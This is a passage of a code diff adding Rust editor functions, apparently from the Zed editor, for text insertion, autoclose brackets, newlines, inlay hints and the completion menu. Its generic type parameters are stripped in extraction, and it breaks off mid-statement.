+ let anchor = snapshot.anchor_after(selection.end); + if !self.linked_edit_ranges.is_empty() { + let start_anchor = snapshot.anchor_before(selection.start); + + let is_word_char = text.chars().next().map_or(true, |char| { + let classifier = snapshot.char_classifier_at(start_anchor.to_offset(&snapshot)); + classifier.is_word(char) + }); + + if is_word_char { + if let Some(ranges) = self + .linked_editing_ranges_for(start_anchor.text_anchor..anchor.text_anchor, cx) + { + for (buffer, edits) in ranges { + linked_edits + .entry(buffer.clone()) + .or_default() + .extend(edits.into_iter().map(|range| (range, text.clone()))); + } + } + } else { + clear_linked_edit_ranges = true; + } + } + + new_selections.push((selection.map(|_| anchor), 0)); + edits.push((selection.start..selection.end, text.clone())); + } + + drop(snapshot); + + self.transact(window, cx, |this, window, cx| { + if clear_linked_edit_ranges { + this.linked_edit_ranges.clear(); + } + let initial_buffer_versions = + jsx_tag_auto_close::construct_initial_buffer_versions_map(this, &edits, cx); + + this.buffer.update(cx, |buffer, cx| { + buffer.edit(edits, this.autoindent_mode.clone(), cx); + }); + for (buffer, edits) in linked_edits { + buffer.update(cx, |buffer, cx| { + let snapshot = buffer.snapshot(); + let edits = edits + .into_iter() + .map(|(range, text)| { + use text::ToPoint as TP; + let end_point = TP::to_point(&range.end, &snapshot); + let start_point = TP::to_point(&range.start, &snapshot); + (start_point..end_point, text) + }) + .sorted_by_key(|(range, _)| range.start); + buffer.edit(edits, None, cx); + }) + } + let new_anchor_selections = new_selections.iter().map(|e| &e.0); + let new_selection_deltas = new_selections.iter().map(|e| e.1); + let map = this.display_map.update(cx, |map, cx| map.snapshot(cx)); + let new_selections = resolve_selections::(new_anchor_selections, &map) + .zip(new_selection_deltas) + .map(|(selection, delta)| Selection { + id: selection.id, + start: selection.start + 
delta, + end: selection.end + delta, + reversed: selection.reversed, + goal: SelectionGoal::None, + }) + .collect::>(); + + let mut i = 0; + for (position, delta, selection_id, pair) in new_autoclose_regions { + let position = position.to_offset(&map.buffer_snapshot) + delta; + let start = map.buffer_snapshot.anchor_before(position); + let end = map.buffer_snapshot.anchor_after(position); + while let Some(existing_state) = this.autoclose_regions.get(i) { + match existing_state.range.start.cmp(&start, &map.buffer_snapshot) { + Ordering::Less => i += 1, + Ordering::Greater => break, + Ordering::Equal => { + match end.cmp(&existing_state.range.end, &map.buffer_snapshot) { + Ordering::Less => i += 1, + Ordering::Equal => break, + Ordering::Greater => break, + } + } + } + } + this.autoclose_regions.insert( + i, + AutocloseRegion { + selection_id, + range: start..end, + pair, + }, + ); + } + + let had_active_inline_completion = this.has_active_inline_completion(); + this.change_selections_inner(Some(Autoscroll::fit()), false, window, cx, |s| { + s.select(new_selections) + }); + + if !bracket_inserted { + if let Some(on_type_format_task) = + this.trigger_on_type_formatting(text.to_string(), window, cx) + { + on_type_format_task.detach_and_log_err(cx); + } + } + + let editor_settings = EditorSettings::get_global(cx); + if bracket_inserted + && (editor_settings.auto_signature_help + || editor_settings.show_signature_help_after_edits) + { + this.show_signature_help(&ShowSignatureHelp, window, cx); + } + + let trigger_in_words = + this.show_edit_predictions_in_menu() || !had_active_inline_completion; + if this.hard_wrap.is_some() { + let latest: Range = this.selections.newest(cx).range(); + if latest.is_empty() + && this + .buffer() + .read(cx) + .snapshot(cx) + .line_len(MultiBufferRow(latest.start.row)) + == latest.start.column + { + this.rewrap_impl( + RewrapOptions { + override_language_settings: true, + preserve_existing_whitespace: true, + }, + cx, + ) + } + } + 
this.trigger_completion_on_input(&text, trigger_in_words, window, cx); + linked_editing_ranges::refresh_linked_ranges(this, window, cx); + this.refresh_inline_completion(true, false, window, cx); + jsx_tag_auto_close::handle_from(this, initial_buffer_versions, window, cx); + }); + } + + fn find_possible_emoji_shortcode_at_position( + snapshot: &MultiBufferSnapshot, + position: Point, + ) -> Option { + let mut chars = Vec::new(); + let mut found_colon = false; + for char in snapshot.reversed_chars_at(position).take(100) { + // Found a possible emoji shortcode in the middle of the buffer + if found_colon { + if char.is_whitespace() { + chars.reverse(); + return Some(chars.iter().collect()); + } + // If the previous character is not a whitespace, we are in the middle of a word + // and we only want to complete the shortcode if the word is made up of other emojis + let mut containing_word = String::new(); + for ch in snapshot + .reversed_chars_at(position) + .skip(chars.len() + 1) + .take(100) + { + if ch.is_whitespace() { + break; + } + containing_word.push(ch); + } + let containing_word = containing_word.chars().rev().collect::(); + if util::word_consists_of_emojis(containing_word.as_str()) { + chars.reverse(); + return Some(chars.iter().collect()); + } + } + + if char.is_whitespace() || !char.is_ascii() { + return None; + } + if char == ':' { + found_colon = true; + } else { + chars.push(char); + } + } + // Found a possible emoji shortcode at the beginning of the buffer + chars.reverse(); + Some(chars.iter().collect()) + } + + pub fn newline(&mut self, _: &Newline, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.transact(window, cx, |this, window, cx| { + let (edits, selection_fixup_info): (Vec<_>, Vec<_>) = { + let selections = this.selections.all::(cx); + let multi_buffer = this.buffer.read(cx); + let buffer = multi_buffer.snapshot(cx); + selections + .iter() + .map(|selection| { + let start_point = 
selection.start.to_point(&buffer); + let mut indent = + buffer.indent_size_for_line(MultiBufferRow(start_point.row)); + indent.len = cmp::min(indent.len, start_point.column); + let start = selection.start; + let end = selection.end; + let selection_is_empty = start == end; + let language_scope = buffer.language_scope_at(start); + let (comment_delimiter, insert_extra_newline) = if let Some(language) = + &language_scope + { + let insert_extra_newline = + insert_extra_newline_brackets(&buffer, start..end, language) + || insert_extra_newline_tree_sitter(&buffer, start..end); + + // Comment extension on newline is allowed only for cursor selections + let comment_delimiter = maybe!({ + if !selection_is_empty { + return None; + } + + if !multi_buffer.language_settings(cx).extend_comment_on_newline { + return None; + } + + let delimiters = language.line_comment_prefixes(); + let max_len_of_delimiter = + delimiters.iter().map(|delimiter| delimiter.len()).max()?; + let (snapshot, range) = + buffer.buffer_line_for_row(MultiBufferRow(start_point.row))?; + + let mut index_of_first_non_whitespace = 0; + let comment_candidate = snapshot + .chars_for_range(range) + .skip_while(|c| { + let should_skip = c.is_whitespace(); + if should_skip { + index_of_first_non_whitespace += 1; + } + should_skip + }) + .take(max_len_of_delimiter) + .collect::(); + let comment_prefix = delimiters.iter().find(|comment_prefix| { + comment_candidate.starts_with(comment_prefix.as_ref()) + })?; + let cursor_is_placed_after_comment_marker = + index_of_first_non_whitespace + comment_prefix.len() + <= start_point.column as usize; + if cursor_is_placed_after_comment_marker { + Some(comment_prefix.clone()) + } else { + None + } + }); + (comment_delimiter, insert_extra_newline) + } else { + (None, false) + }; + + let capacity_for_delimiter = comment_delimiter + .as_deref() + .map(str::len) + .unwrap_or_default(); + let mut new_text = + String::with_capacity(1 + capacity_for_delimiter + indent.len as usize); + 
new_text.push('\n'); + new_text.extend(indent.chars()); + if let Some(delimiter) = &comment_delimiter { + new_text.push_str(delimiter); + } + if insert_extra_newline { + new_text = new_text.repeat(2); + } + + let anchor = buffer.anchor_after(end); + let new_selection = selection.map(|_| anchor); + ( + (start..end, new_text), + (insert_extra_newline, new_selection), + ) + }) + .unzip() + }; + + this.edit_with_autoindent(edits, cx); + let buffer = this.buffer.read(cx).snapshot(cx); + let new_selections = selection_fixup_info + .into_iter() + .map(|(extra_newline_inserted, new_selection)| { + let mut cursor = new_selection.end.to_point(&buffer); + if extra_newline_inserted { + cursor.row -= 1; + cursor.column = buffer.line_len(MultiBufferRow(cursor.row)); + } + new_selection.map(|_| cursor) + }) + .collect(); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select(new_selections) + }); + this.refresh_inline_completion(true, false, window, cx); + }); + } + + pub fn newline_above(&mut self, _: &NewlineAbove, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + + let mut edits = Vec::new(); + let mut rows = Vec::new(); + + for (rows_inserted, selection) in self.selections.all_adjusted(cx).into_iter().enumerate() { + let cursor = selection.head(); + let row = cursor.row; + + let start_of_line = snapshot.clip_point(Point::new(row, 0), Bias::Left); + + let newline = "\n".to_string(); + edits.push((start_of_line..start_of_line, newline)); + + rows.push(row + rows_inserted as u32); + } + + self.transact(window, cx, |editor, window, cx| { + editor.edit(edits, cx); + + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let mut index = 0; + s.move_cursors_with(|map, _, _| { + let row = rows[index]; + index += 1; + + let point = Point::new(row, 0); + let boundary = map.next_line_boundary(point).1; + let 
clipped = map.clip_point(boundary, Bias::Left); + + (clipped, SelectionGoal::None) + }); + }); + + let mut indent_edits = Vec::new(); + let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); + for row in rows { + let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); + for (row, indent) in indents { + if indent.len == 0 { + continue; + } + + let text = match indent.kind { + IndentKind::Space => " ".repeat(indent.len as usize), + IndentKind::Tab => "\t".repeat(indent.len as usize), + }; + let point = Point::new(row.0, 0); + indent_edits.push((point..point, text)); + } + } + editor.edit(indent_edits, cx); + }); + } + + pub fn newline_below(&mut self, _: &NewlineBelow, window: &mut Window, cx: &mut Context) { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + + let buffer = self.buffer.read(cx); + let snapshot = buffer.snapshot(cx); + + let mut edits = Vec::new(); + let mut rows = Vec::new(); + let mut rows_inserted = 0; + + for selection in self.selections.all_adjusted(cx) { + let cursor = selection.head(); + let row = cursor.row; + + let point = Point::new(row + 1, 0); + let start_of_line = snapshot.clip_point(point, Bias::Left); + + let newline = "\n".to_string(); + edits.push((start_of_line..start_of_line, newline)); + + rows_inserted += 1; + rows.push(row + rows_inserted); + } + + self.transact(window, cx, |editor, window, cx| { + editor.edit(edits, cx); + + editor.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + let mut index = 0; + s.move_cursors_with(|map, _, _| { + let row = rows[index]; + index += 1; + + let point = Point::new(row, 0); + let boundary = map.next_line_boundary(point).1; + let clipped = map.clip_point(boundary, Bias::Left); + + (clipped, SelectionGoal::None) + }); + }); + + let mut indent_edits = Vec::new(); + let multibuffer_snapshot = editor.buffer.read(cx).snapshot(cx); + for row in rows { + let indents = multibuffer_snapshot.suggested_indents(row..row + 1, cx); + for (row, indent) in 
indents { + if indent.len == 0 { + continue; + } + + let text = match indent.kind { + IndentKind::Space => " ".repeat(indent.len as usize), + IndentKind::Tab => "\t".repeat(indent.len as usize), + }; + let point = Point::new(row.0, 0); + indent_edits.push((point..point, text)); + } + } + editor.edit(indent_edits, cx); + }); + } + + pub fn insert(&mut self, text: &str, window: &mut Window, cx: &mut Context) { + let autoindent = text.is_empty().not().then(|| AutoindentMode::Block { + original_indent_columns: Vec::new(), + }); + self.insert_with_autoindent_mode(text, autoindent, window, cx); + } + + fn insert_with_autoindent_mode( + &mut self, + text: &str, + autoindent_mode: Option, + window: &mut Window, + cx: &mut Context, + ) { + if self.read_only(cx) { + return; + } + + let text: Arc = text.into(); + self.transact(window, cx, |this, window, cx| { + let old_selections = this.selections.all_adjusted(cx); + let selection_anchors = this.buffer.update(cx, |buffer, cx| { + let anchors = { + let snapshot = buffer.read(cx); + old_selections + .iter() + .map(|s| { + let anchor = snapshot.anchor_after(s.head()); + s.map(|_| anchor) + }) + .collect::>() + }; + buffer.edit( + old_selections + .iter() + .map(|s| (s.start..s.end, text.clone())), + autoindent_mode, + cx, + ); + anchors + }); + + this.change_selections(Some(Autoscroll::fit()), window, cx, |s| { + s.select_anchors(selection_anchors); + }); + + cx.notify(); + }); + } + + fn trigger_completion_on_input( + &mut self, + text: &str, + trigger_in_words: bool, + window: &mut Window, + cx: &mut Context, + ) { + let ignore_completion_provider = self + .context_menu + .borrow() + .as_ref() + .map(|menu| match menu { + CodeContextMenu::Completions(completions_menu) => { + completions_menu.ignore_completion_provider + } + CodeContextMenu::CodeActions(_) => false, + }) + .unwrap_or(false); + + if ignore_completion_provider { + self.show_word_completions(&ShowWordCompletions, window, cx); + } else if 
self.is_completion_trigger(text, trigger_in_words, cx) { + self.show_completions( + &ShowCompletions { + trigger: Some(text.to_owned()).filter(|x| !x.is_empty()), + }, + window, + cx, + ); + } else { + self.hide_context_menu(window, cx); + } + } + + fn is_completion_trigger( + &self, + text: &str, + trigger_in_words: bool, + cx: &mut Context, + ) -> bool { + let position = self.selections.newest_anchor().head(); + let multibuffer = self.buffer.read(cx); + let Some(buffer) = position + .buffer_id + .and_then(|buffer_id| multibuffer.buffer(buffer_id).clone()) + else { + return false; + }; + + if let Some(completion_provider) = &self.completion_provider { + completion_provider.is_completion_trigger( + &buffer, + position.text_anchor, + text, + trigger_in_words, + cx, + ) + } else { + false + } + } + + /// If any empty selections is touching the start of its innermost containing autoclose + /// region, expand it to select the brackets. + fn select_autoclose_pair(&mut self, window: &mut Window, cx: &mut Context) { + let selections = self.selections.all::(cx); + let buffer = self.buffer.read(cx).read(cx); + let new_selections = self + .selections_with_autoclose_regions(selections, &buffer) + .map(|(mut selection, region)| { + if !selection.is_empty() { + return selection; + } + + if let Some(region) = region { + let mut range = region.range.to_offset(&buffer); + if selection.start == range.start && range.start >= region.pair.start.len() { + range.start -= region.pair.start.len(); + if buffer.contains_str_at(range.start, ®ion.pair.start) + && buffer.contains_str_at(range.end, ®ion.pair.end) + { + range.end += region.pair.end.len(); + selection.start = range.start; + selection.end = range.end; + + return selection; + } + } + } + + let always_treat_brackets_as_autoclosed = buffer + .language_settings_at(selection.start, cx) + .always_treat_brackets_as_autoclosed; + + if !always_treat_brackets_as_autoclosed { + return selection; + } + + if let Some(scope) = 
buffer.language_scope_at(selection.start) { + for (pair, enabled) in scope.brackets() { + if !enabled || !pair.close { + continue; + } + + if buffer.contains_str_at(selection.start, &pair.end) { + let pair_start_len = pair.start.len(); + if buffer.contains_str_at( + selection.start.saturating_sub(pair_start_len), + &pair.start, + ) { + selection.start -= pair_start_len; + selection.end += pair.end.len(); + + return selection; + } + } + } + } + + selection + }) + .collect(); + + drop(buffer); + self.change_selections(None, window, cx, |selections| { + selections.select(new_selections) + }); + } + + /// Iterate the given selections, and for each one, find the smallest surrounding + /// autoclose region. This uses the ordering of the selections and the autoclose + /// regions to avoid repeated comparisons. + fn selections_with_autoclose_regions<'a, D: ToOffset + Clone>( + &'a self, + selections: impl IntoIterator>, + buffer: &'a MultiBufferSnapshot, + ) -> impl Iterator, Option<&'a AutocloseRegion>)> { + let mut i = 0; + let mut regions = self.autoclose_regions.as_slice(); + selections.into_iter().map(move |selection| { + let range = selection.start.to_offset(buffer)..selection.end.to_offset(buffer); + + let mut enclosing = None; + while let Some(pair_state) = regions.get(i) { + if pair_state.range.end.to_offset(buffer) < range.start { + regions = ®ions[i + 1..]; + i = 0; + } else if pair_state.range.start.to_offset(buffer) > range.end { + break; + } else { + if pair_state.selection_id == selection.id { + enclosing = Some(pair_state); + } + i += 1; + } + } + + (selection, enclosing) + }) + } + + /// Remove any autoclose regions that no longer contain their selection. 
+ fn invalidate_autoclose_regions( + &mut self, + mut selections: &[Selection], + buffer: &MultiBufferSnapshot, + ) { + self.autoclose_regions.retain(|state| { + let mut i = 0; + while let Some(selection) = selections.get(i) { + if selection.end.cmp(&state.range.start, buffer).is_lt() { + selections = &selections[1..]; + continue; + } + if selection.start.cmp(&state.range.end, buffer).is_gt() { + break; + } + if selection.id == state.selection_id { + return true; + } else { + i += 1; + } + } + false + }); + } + + fn completion_query(buffer: &MultiBufferSnapshot, position: impl ToOffset) -> Option { + let offset = position.to_offset(buffer); + let (word_range, kind) = buffer.surrounding_word(offset, true); + if offset > word_range.start && kind == Some(CharKind::Word) { + Some( + buffer + .text_for_range(word_range.start..offset) + .collect::(), + ) + } else { + None + } + } + + pub fn toggle_inline_values( + &mut self, + _: &ToggleInlineValues, + _: &mut Window, + cx: &mut Context, + ) { + self.inline_value_cache.enabled = !self.inline_value_cache.enabled; + + self.refresh_inline_values(cx); + } + + pub fn toggle_inlay_hints( + &mut self, + _: &ToggleInlayHints, + _: &mut Window, + cx: &mut Context, + ) { + self.refresh_inlay_hints( + InlayHintRefreshReason::Toggle(!self.inlay_hints_enabled()), + cx, + ); + } + + pub fn inlay_hints_enabled(&self) -> bool { + self.inlay_hint_cache.enabled + } + + pub fn inline_values_enabled(&self) -> bool { + self.inline_value_cache.enabled + } + + fn refresh_inlay_hints(&mut self, reason: InlayHintRefreshReason, cx: &mut Context) { + if self.semantics_provider.is_none() || !self.mode.is_full() { + return; + } + + let reason_description = reason.description(); + let ignore_debounce = matches!( + reason, + InlayHintRefreshReason::SettingsChange(_) + | InlayHintRefreshReason::Toggle(_) + | InlayHintRefreshReason::ExcerptsRemoved(_) + | InlayHintRefreshReason::ModifiersChanged(_) + ); + let (invalidate_cache, required_languages) = 
match reason { + InlayHintRefreshReason::ModifiersChanged(enabled) => { + match self.inlay_hint_cache.modifiers_override(enabled) { + Some(enabled) => { + if enabled { + (InvalidationStrategy::RefreshRequested, None) + } else { + self.splice_inlays( + &self + .visible_inlay_hints(cx) + .iter() + .map(|inlay| inlay.id) + .collect::>(), + Vec::new(), + cx, + ); + return; + } + } + None => return, + } + } + InlayHintRefreshReason::Toggle(enabled) => { + if self.inlay_hint_cache.toggle(enabled) { + if enabled { + (InvalidationStrategy::RefreshRequested, None) + } else { + self.splice_inlays( + &self + .visible_inlay_hints(cx) + .iter() + .map(|inlay| inlay.id) + .collect::>(), + Vec::new(), + cx, + ); + return; + } + } else { + return; + } + } + InlayHintRefreshReason::SettingsChange(new_settings) => { + match self.inlay_hint_cache.update_settings( + &self.buffer, + new_settings, + self.visible_inlay_hints(cx), + cx, + ) { + ControlFlow::Break(Some(InlaySplice { + to_remove, + to_insert, + })) => { + self.splice_inlays(&to_remove, to_insert, cx); + return; + } + ControlFlow::Break(None) => return, + ControlFlow::Continue(()) => (InvalidationStrategy::RefreshRequested, None), + } + } + InlayHintRefreshReason::ExcerptsRemoved(excerpts_removed) => { + if let Some(InlaySplice { + to_remove, + to_insert, + }) = self.inlay_hint_cache.remove_excerpts(&excerpts_removed) + { + self.splice_inlays(&to_remove, to_insert, cx); + } + self.display_map.update(cx, |display_map, _| { + display_map.remove_inlays_for_excerpts(&excerpts_removed) + }); + return; + } + InlayHintRefreshReason::NewLinesShown => (InvalidationStrategy::None, None), + InlayHintRefreshReason::BufferEdited(buffer_languages) => { + (InvalidationStrategy::BufferEdited, Some(buffer_languages)) + } + InlayHintRefreshReason::RefreshRequested => { + (InvalidationStrategy::RefreshRequested, None) + } + }; + + if let Some(InlaySplice { + to_remove, + to_insert, + }) = self.inlay_hint_cache.spawn_hint_refresh( + 
reason_description, + self.excerpts_for_inlay_hints_query(required_languages.as_ref(), cx), + invalidate_cache, + ignore_debounce, + cx, + ) { + self.splice_inlays(&to_remove, to_insert, cx); + } + } + + fn visible_inlay_hints(&self, cx: &Context) -> Vec { + self.display_map + .read(cx) + .current_inlays() + .filter(move |inlay| matches!(inlay.id, InlayId::Hint(_))) + .cloned() + .collect() + } + + pub fn excerpts_for_inlay_hints_query( + &self, + restrict_to_languages: Option<&HashSet>>, + cx: &mut Context, + ) -> HashMap, clock::Global, Range)> { + let Some(project) = self.project.as_ref() else { + return HashMap::default(); + }; + let project = project.read(cx); + let multi_buffer = self.buffer().read(cx); + let multi_buffer_snapshot = multi_buffer.snapshot(cx); + let multi_buffer_visible_start = self + .scroll_manager + .anchor() + .anchor + .to_point(&multi_buffer_snapshot); + let multi_buffer_visible_end = multi_buffer_snapshot.clip_point( + multi_buffer_visible_start + + Point::new(self.visible_line_count().unwrap_or(0.).ceil() as u32, 0), + Bias::Left, + ); + let multi_buffer_visible_range = multi_buffer_visible_start..multi_buffer_visible_end; + multi_buffer_snapshot + .range_to_buffer_ranges(multi_buffer_visible_range) + .into_iter() + .filter(|(_, excerpt_visible_range, _)| !excerpt_visible_range.is_empty()) + .filter_map(|(buffer, excerpt_visible_range, excerpt_id)| { + let buffer_file = project::File::from_dyn(buffer.file())?; + let buffer_worktree = project.worktree_for_id(buffer_file.worktree_id(cx), cx)?; + let worktree_entry = buffer_worktree + .read(cx) + .entry_for_id(buffer_file.project_entry_id(cx)?)?; + if worktree_entry.is_ignored { + return None; + } + + let language = buffer.language()?; + if let Some(restrict_to_languages) = restrict_to_languages { + if !restrict_to_languages.contains(language) { + return None; + } + } + Some(( + excerpt_id, + ( + multi_buffer.buffer(buffer.remote_id()).unwrap(), + buffer.version().clone(), + 
excerpt_visible_range, + ), + )) + }) + .collect() + } + + pub fn text_layout_details(&self, window: &mut Window) -> TextLayoutDetails { + TextLayoutDetails { + text_system: window.text_system().clone(), + editor_style: self.style.clone().unwrap(), + rem_size: window.rem_size(), + scroll_anchor: self.scroll_manager.anchor(), + visible_rows: self.visible_line_count(), + vertical_scroll_margin: self.scroll_manager.vertical_scroll_margin, + } + } + + pub fn splice_inlays( + &self, + to_remove: &[InlayId], + to_insert: Vec, + cx: &mut Context, + ) { + self.display_map.update(cx, |display_map, cx| { + display_map.splice_inlays(to_remove, to_insert, cx) + }); + cx.notify(); + } + + fn trigger_on_type_formatting( + &self, + input: String, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + if input.len() != 1 { + return None; + } + + let project = self.project.as_ref()?; + let position = self.selections.newest_anchor().head(); + let (buffer, buffer_position) = self + .buffer + .read(cx) + .text_anchor_for_position(position, cx)?; + + let settings = language_settings::language_settings( + buffer + .read(cx) + .language_at(buffer_position) + .map(|l| l.name()), + buffer.read(cx).file(), + cx, + ); + if !settings.use_on_type_format { + return None; + } + + // OnTypeFormatting returns a list of edits, no need to pass them between Zed instances, + // hence we do LSP request & edit on host side only — add formats to host's history. + let push_to_lsp_host_history = true; + // If this is not the host, append its history with new edits. + let push_to_client_history = project.read(cx).is_via_collab(); + + let on_type_formatting = project.update(cx, |project, cx| { + project.on_type_format( + buffer.clone(), + buffer_position, + input, + push_to_lsp_host_history, + cx, + ) + }); + Some(cx.spawn_in(window, async move |editor, cx| { + if let Some(transaction) = on_type_formatting.await? 
{ + if push_to_client_history { + buffer + .update(cx, |buffer, _| { + buffer.push_transaction(transaction, Instant::now()); + buffer.finalize_last_transaction(); + }) + .ok(); + } + editor.update(cx, |editor, cx| { + editor.refresh_document_highlights(cx); + })?; + } + Ok(()) + })) + } + + pub fn show_word_completions( + &mut self, + _: &ShowWordCompletions, + window: &mut Window, + cx: &mut Context, + ) { + self.open_completions_menu(true, None, window, cx); + } + + pub fn show_completions( + &mut self, + options: &ShowCompletions, + window: &mut Window, + cx: &mut Context, + ) { + self.open_completions_menu(false, options.trigger.as_deref(), window, cx); + } + + fn open_completions_menu( + &mut self, + ignore_completion_provider: bool, + trigger: Option<&str>, + window: &mut Window, + cx: &mut Context, + ) { + if self.pending_rename.is_some() { + return; + } + if !self.snippet_stack.is_empty() && self.context_menu.borrow().as_ref().is_some() { + return; + } + + let position = self.selections.newest_anchor().head(); + if position.diff_base_anchor.is_some() { + return; + } + let (buffer, buffer_position) = + if let Some(output) = self.buffer.read(cx).text_anchor_for_position(position, cx) { + output + } else { + return; + }; + let buffer_snapshot = buffer.read(cx).snapshot(); + let show_completion_documentation = buffer_snapshot + .settings_at(buffer_position, cx) + .show_completion_documentation; + + let query = Self::completion_query(&self.buffer.read(cx).read(cx), position); + + let trigger_kind = match trigger { + Some(trigger) if buffer.read(cx).completion_triggers().contains(trigger) => { + CompletionTriggerKind::TRIGGER_CHARACTER + } + _ => CompletionTriggerKind::INVOKED, + }; + let completion_context = CompletionContext { + trigger_character: trigger.and_then(|trigger| { + if trigger_kind == CompletionTriggerKind::TRIGGER_CHARACTER { + Some(String::from(trigger)) + } else { + None + } + }), + trigger_kind, + }; + + let (old_range, word_kind) = 
buffer_snapshot.surrounding_word(buffer_position); + let (old_range, word_to_exclude) = if word_kind == Some(CharKind::Word) { + let word_to_exclude = buffer_snapshot + .text_for_range(old_range.clone()) + .collect::(); + ( + buffer_snapshot.anchor_before(old_range.start) + ..buffer_snapshot.anchor_after(old_range.end), + Some(word_to_exclude), + ) + } else { + (buffer_position..buffer_position, None) + }; + + let completion_settings = language_settings( + buffer_snapshot + .language_at(buffer_position) + .map(|language| language.name()), + buffer_snapshot.file(), + cx, + ) + .completions; + + // The document can be large, so stay in reasonable bounds when searching for words, + // otherwise completion pop-up might be slow to appear. + const WORD_LOOKUP_ROWS: u32 = 5_000; + let buffer_row = text::ToPoint::to_point(&buffer_position, &buffer_snapshot).row; + let min_word_search = buffer_snapshot.clip_point( + Point::new(buffer_row.saturating_sub(WORD_LOOKUP_ROWS), 0), + Bias::Left, + ); + let max_word_search = buffer_snapshot.clip_point( + Point::new(buffer_row + WORD_LOOKUP_ROWS, 0).min(buffer_snapshot.max_point()), + Bias::Right, + ); + let word_search_range = buffer_snapshot.point_to_offset(min_word_search) + ..buffer_snapshot.point_to_offset(max_word_search); + + let provider = self + .completion_provider + .as_ref() + .filter(|_| !ignore_completion_provider); + let skip_digits = query + .as_ref() + .map_or(true, |query| !query.chars().any(|c| c.is_digit(10))); + + let (mut words, provided_completions) = match provider { + Some(provider) => { + let completions = provider.completions( + position.excerpt_id, + &buffer, + buffer_position, + completion_context, + window, + cx, + ); + + let words = match completion_settings.words { + WordsCompletionMode::Disabled => Task::ready(BTreeMap::default()), + WordsCompletionMode::Enabled | WordsCompletionMode::Fallback => cx + .background_spawn(async move { + buffer_snapshot.words_in_range(WordsQuery { + fuzzy_contents: None, 
+ range: word_search_range, + skip_digits, + }) + }), + }; + + (words, completions) + } + None => ( + cx.background_spawn(async move { + buffer_snapshot.words_in_range(WordsQuery { + fuzzy_contents: None, + range: word_search_range, + skip_digits, + }) + }), + Task::ready(Ok(None)), + ), + }; + + let sort_completions = provider + .as_ref() + .map_or(false, |provider| provider.sort_completions()); + + let filter_completions = provider + .as_ref() + .map_or(true, |provider| provider.filter_completions()); + + let snippet_sort_order = EditorSettings::get_global(cx).snippet_sort_order; + + let id = post_inc(&mut self.next_completion_id); + let task = cx.spawn_in(window, async move |editor, cx| { + async move { + editor.update(cx, |this, _| { + this.completion_tasks.retain(|(task_id, _)| *task_id >= id); + })?; + + let mut completions = Vec::new(); + if let Some(provided_completions) = provided_completions.await.log_err().flatten() { + completions.extend(provided_completions); + if completion_settings.words == WordsCompletionMode::Fallback { + words = Task::ready(BTreeMap::default()); + } + } + + let mut words = words.await; + if let Some(word_to_exclude) = &word_to_exclude { + words.remove(word_to_exclude); + } + for lsp_completion in &completions { + words.remove(&lsp_completion.new_text); + } + completions.extend(words.into_iter().map(|(word, word_range)| Completion { + replace_range: old_range.clone(), + new_text: word.clone(), + label: CodeLabel::plain(word, None), + icon_path: None, + documentation: None, + source: CompletionSource::BufferWord { + word_range, + resolved: false, + }, + insert_text_mode: Some(InsertTextMode::AS_IS), + confirm: None, + })); + + let menu = if completions.is_empty() { + None + } else { + let mut menu = CompletionsMenu::new( + id, + sort_completions, + show_completion_documentation, + ignore_completion_provider, + position, + buffer.clone(), + completions.into(), + snippet_sort_order, + ); + + menu.filter( + if filter_completions { + 
query.as_deref() + } else { + None + }, + cx.background_executor().clone(), + ) + .await; + + menu.visible().then_some(menu) + }; + + editor.update_in(cx, |editor, window, cx| { + match editor.context_menu.borrow().as_ref() { + None => {} + Some(CodeContextMenu::Completions(prev_menu)) => { + if prev_menu.id > id { + return; + } + } + _ => return, + } + + if editor.focus_handle.is_focused(window) && menu.is_some() { + let mut menu = menu.unwrap(); + menu.resolve_visible_completions(editor.completion_provider.as_deref(), cx); + + *editor.context_menu.borrow_mut() = + Some(CodeContextMenu::Completions(menu)); + + if editor.show_edit_predictions_in_menu() { + editor.update_visible_inline_completion(window, cx); + } else { + editor.discard_inline_completion(false, cx); + } + + cx.notify(); + } else if editor.completion_tasks.len() <= 1 { + // If there are no more completion tasks and the last menu was + // empty, we should hide it. + let was_hidden = editor.hide_context_menu(window, cx).is_none(); + // If it was already hidden and we don't show inline + // completions in the menu, we should also show the + // inline-completion when available. + if was_hidden && editor.show_edit_predictions_in_menu() { + editor.update_visible_inline_completion(window, cx); + } + } + })?; + + anyhow::Ok(()) + } + .log_err() + .await + }); + + self.completion_tasks.push((id, task)); + } + + #[cfg(feature = "test-support")] + pub fn current_completions(&self) -> Option> { + let menu = self.context_menu.borrow(); + if let CodeContextMenu::Completions(menu) = menu.as_ref()? 
{ + let completions = menu.completions.borrow(); + Some(completions.to_vec()) + } else { + None + } + } + + pub fn confirm_completion( + &mut self, + action: &ConfirmCompletion, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(action.item_ix, CompletionIntent::Complete, window, cx) + } + + pub fn confirm_completion_insert( + &mut self, + _: &ConfirmCompletionInsert, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(None, CompletionIntent::CompleteWithInsert, window, cx) + } + + pub fn confirm_completion_replace( + &mut self, + _: &ConfirmCompletionReplace, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(None, CompletionIntent::CompleteWithReplace, window, cx) + } + + pub fn compose_completion( + &mut self, + action: &ComposeCompletion, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + self.hide_mouse_cursor(&HideMouseCursorOrigin::TypingAction); + self.do_completion(action.item_ix, CompletionIntent::Compose, window, cx) + } + + fn do_completion( + &mut self, + item_ix: Option, + intent: CompletionIntent, + window: &mut Window, + cx: &mut Context, + ) -> Option>> { + use language::ToOffset as _; + + let CodeContextMenu::Completions(completions_menu) = self.hide_context_menu(window, cx)? + else { + return None; + }; + + let candidate_id = { + let entries = 